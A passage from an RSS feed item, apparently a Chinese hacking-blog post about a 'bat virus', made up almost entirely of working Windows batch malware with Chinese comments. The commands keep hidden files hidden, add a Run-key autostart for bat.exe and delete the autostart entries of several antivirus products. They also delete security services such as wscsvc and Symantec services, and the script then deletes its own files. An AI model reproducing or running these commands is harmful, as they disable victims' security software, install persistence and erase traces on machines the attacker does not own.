REG ADD &#8220;HKEY_LOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL&#8221; /v &#8220;CheckedValue&#8221; /t REG_DWORD /d 0 /f<br />
REM 添加注册表自启动项<br />
REG ADD &#8220;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&#8221; /v type /t REG_EXPAND_SZ /d &#8220;c:\Windows\system32\bat.exe&#8221; /f<br />
//REG ADD是对注册表进行添加操作， /v后面跟项的名称 /t后面跟数据类型 /f表示强制操作不提示<br />
REM 删除安全软件在注册表中的键值<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RavTask /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v &#8220;Network Associates Error RePorting Service&#8221; /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStartEXE /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f<br />
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f<br />
REM 删除以下服务<br />
sc delete navapsvc<br />
sc delete wscsvc<br />
sc delete KPfwSvc<br />
sc delete SNDSrvc<br />
sc delete ccProxy<br />
sc delete ccEvtMgr<br />
sc delete ccSetMgr<br />
sc delete SPBBCSvc<br />
sc delete Symantec Core LC<br />
sc delete NPFMntor<br />
sc delete MskService<br />
sc delete FireSvc<br />
del muma.com<br />
del bat.vbs<br />
del %O<br />
// %O 是删除自身的意思</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/bat-virus/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

